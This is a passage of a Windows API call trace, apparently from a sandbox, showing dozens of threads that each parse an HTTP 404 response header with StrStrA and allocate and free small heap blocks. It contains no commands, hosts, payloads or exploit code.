hHeap=0x6a0000) returned 1 Thread: id = 561 os_tid = 0x1818 [0293.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.808] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.808] GetProcessHeap () returned 0x6a0000 [0293.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0293.809] GetProcessHeap () returned 0x6a0000 [0293.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0293.809] GetProcessHeap () returned 0x6a0000 [0293.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 562 os_tid = 0x181c [0294.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.172] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0294.172] GetProcessHeap () returned 0x6a0000 [0294.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0294.173] GetProcessHeap () returned 0x6a0000 [0294.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0294.173] GetProcessHeap () returned 0x6a0000 [0294.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 563 os_tid = 0x1820 [0294.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.416] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0294.416] GetProcessHeap () returned 0x6a0000 [0294.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0294.416] GetProcessHeap () returned 0x6a0000 [0294.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0294.416] GetProcessHeap () returned 0x6a0000 [0294.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 564 os_tid = 0x1824 [0294.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.681] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0294.681] GetProcessHeap () returned 0x6a0000 [0294.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0294.681] GetProcessHeap () returned 0x6a0000 [0294.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0294.681] GetProcessHeap () returned 0x6a0000 [0294.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 565 os_tid = 0x1828 [0295.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.283] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.284] GetProcessHeap () returned 0x6a0000 [0295.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0295.284] GetProcessHeap () returned 0x6a0000 [0295.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0295.284] GetProcessHeap () returned 0x6a0000 [0295.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 566 os_tid = 0x182c [0295.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.816] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.816] GetProcessHeap () returned 0x6a0000 [0295.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be910 [0295.816] GetProcessHeap () returned 0x6a0000 [0295.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be910 | out: hHeap=0x6a0000) returned 1 [0295.816] GetProcessHeap () returned 0x6a0000 [0295.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 567 os_tid = 0x1830 [0295.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.967] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.967] GetProcessHeap () returned 0x6a0000 [0295.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0295.967] GetProcessHeap () returned 0x6a0000 [0295.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0295.967] GetProcessHeap () returned 0x6a0000 [0295.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 568 os_tid = 0x1834 [0296.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.228] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.228] GetProcessHeap () returned 0x6a0000 [0296.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0296.228] GetProcessHeap () returned 0x6a0000 [0296.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0296.228] GetProcessHeap () returned 0x6a0000 [0296.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 569 os_tid = 0x1838 [0296.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.490] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.490] GetProcessHeap () returned 0x6a0000 [0296.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0296.490] GetProcessHeap () returned 0x6a0000 [0296.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0296.490] GetProcessHeap () returned 0x6a0000 [0296.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 570 os_tid = 0x1840 [0296.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.717] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.717] GetProcessHeap () returned 0x6a0000 [0296.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0296.717] GetProcessHeap () returned 0x6a0000 [0296.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0296.717] GetProcessHeap () returned 0x6a0000 [0296.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 571 os_tid = 0x1848 [0296.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.916] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.916] GetProcessHeap () returned 0x6a0000 [0296.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0296.916] GetProcessHeap () returned 0x6a0000 [0296.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0296.916] GetProcessHeap () returned 0x6a0000 [0296.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 572 os_tid = 0x184c [0297.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.171] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.172] GetProcessHeap () returned 0x6a0000 [0297.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0297.172] GetProcessHeap () returned 0x6a0000 [0297.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0297.198] GetProcessHeap () returned 0x6a0000 [0297.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 573 os_tid = 0x1850 [0297.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.380] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.380] GetProcessHeap () returned 0x6a0000 [0297.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0297.380] GetProcessHeap () returned 0x6a0000 [0297.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0297.380] GetProcessHeap () returned 0x6a0000 [0297.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 574 os_tid = 0x1854 [0297.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.726] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.726] GetProcessHeap () returned 0x6a0000 [0297.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0297.727] GetProcessHeap () returned 0x6a0000 [0297.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0297.727] GetProcessHeap () returned 0x6a0000 [0297.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 575 os_tid = 0x1858 [0297.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.958] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.958] GetProcessHeap () returned 0x6a0000 [0297.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0297.958] GetProcessHeap () returned 0x6a0000 [0297.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0297.958] GetProcessHeap () returned 0x6a0000 [0297.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 576 os_tid = 0x185c [0298.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.160] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.160] GetProcessHeap () returned 0x6a0000 [0298.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9d0 [0298.160] GetProcessHeap () returned 0x6a0000 [0298.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9d0 | out: hHeap=0x6a0000) returned 1 [0298.160] GetProcessHeap () returned 0x6a0000 [0298.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 577 os_tid = 0x1860 [0298.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.380] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.380] GetProcessHeap () returned 0x6a0000 [0298.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9d0 [0298.381] GetProcessHeap () returned 0x6a0000 [0298.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9d0 | out: hHeap=0x6a0000) returned 1 [0298.381] GetProcessHeap () returned 0x6a0000 [0298.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 578 os_tid = 0x1864 [0298.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.830] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.830] GetProcessHeap () returned 0x6a0000 [0298.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0298.831] GetProcessHeap () returned 0x6a0000 [0298.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0298.831] GetProcessHeap () returned 0x6a0000 [0298.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 579 os_tid = 0x1868 [0299.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.108] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.108] GetProcessHeap () returned 0x6a0000 [0299.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0299.108] GetProcessHeap () returned 0x6a0000 [0299.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0299.108] GetProcessHeap () returned 0x6a0000 [0299.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 580 os_tid = 0x1870 [0299.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.292] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.292] GetProcessHeap () returned 0x6a0000 [0299.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0299.293] GetProcessHeap () returned 0x6a0000 [0299.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0299.293] GetProcessHeap () returned 0x6a0000 [0299.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 581 os_tid = 0x1874 [0299.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.650] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.650] GetProcessHeap () returned 0x6a0000 [0299.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0299.650] GetProcessHeap () returned 0x6a0000 [0299.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0299.650] GetProcessHeap () returned 0x6a0000 [0299.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 582 os_tid = 0x1878 [0299.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0299.929] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.929] GetProcessHeap () returned 0x6a0000 [0299.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0299.929] GetProcessHeap () returned 0x6a0000 [0299.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0299.929] GetProcessHeap () returned 0x6a0000 [0299.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 583 os_tid = 0x1880 [0300.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.103] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0300.103] GetProcessHeap () returned 0x6a0000 [0300.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0300.103] GetProcessHeap () returned 0x6a0000 [0300.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0300.103] GetProcessHeap () returned 0x6a0000 [0300.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 584 os_tid = 0x1888 [0300.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.449] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0300.450] GetProcessHeap () returned 0x6a0000 [0300.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0300.450] GetProcessHeap () returned 0x6a0000 [0300.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0300.450] GetProcessHeap () returned 0x6a0000 [0300.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 585 os_tid = 0x1890 [0300.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.696] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0300.696] GetProcessHeap () returned 0x6a0000 [0300.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0300.696] GetProcessHeap () returned 0x6a0000 [0300.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0300.696] GetProcessHeap () returned 0x6a0000 [0300.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 586 os_tid = 0x1894 [0300.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.852] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0300.852] GetProcessHeap () returned 0x6a0000 [0300.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0300.852] GetProcessHeap () returned 0x6a0000 [0300.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0300.852] GetProcessHeap () returned 0x6a0000 [0300.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 587 os_tid = 0x1898 [0301.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.101] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0301.101] GetProcessHeap () returned 0x6a0000 [0301.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0301.101] GetProcessHeap () returned 0x6a0000 [0301.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0301.101] GetProcessHeap () returned 0x6a0000 [0301.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 588 os_tid = 0x189c [0301.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.586] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0301.587] GetProcessHeap () returned 0x6a0000 [0301.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0301.587] GetProcessHeap () returned 0x6a0000 [0301.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0301.587] GetProcessHeap () returned 0x6a0000 [0301.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 589 os_tid = 0x18a0 [0301.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.798] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0301.798] GetProcessHeap () returned 0x6a0000 [0301.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0301.798] GetProcessHeap () returned 0x6a0000 [0301.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0301.798] GetProcessHeap () returned 0x6a0000 [0301.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 590 os_tid = 0x18a4 [0302.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.525] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0302.526] GetProcessHeap () returned 0x6a0000 [0302.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0302.526] GetProcessHeap () returned 0x6a0000 [0302.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0302.526] GetProcessHeap () returned 0x6a0000 [0302.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 591 os_tid = 0x18a8 [0302.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.793] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:29 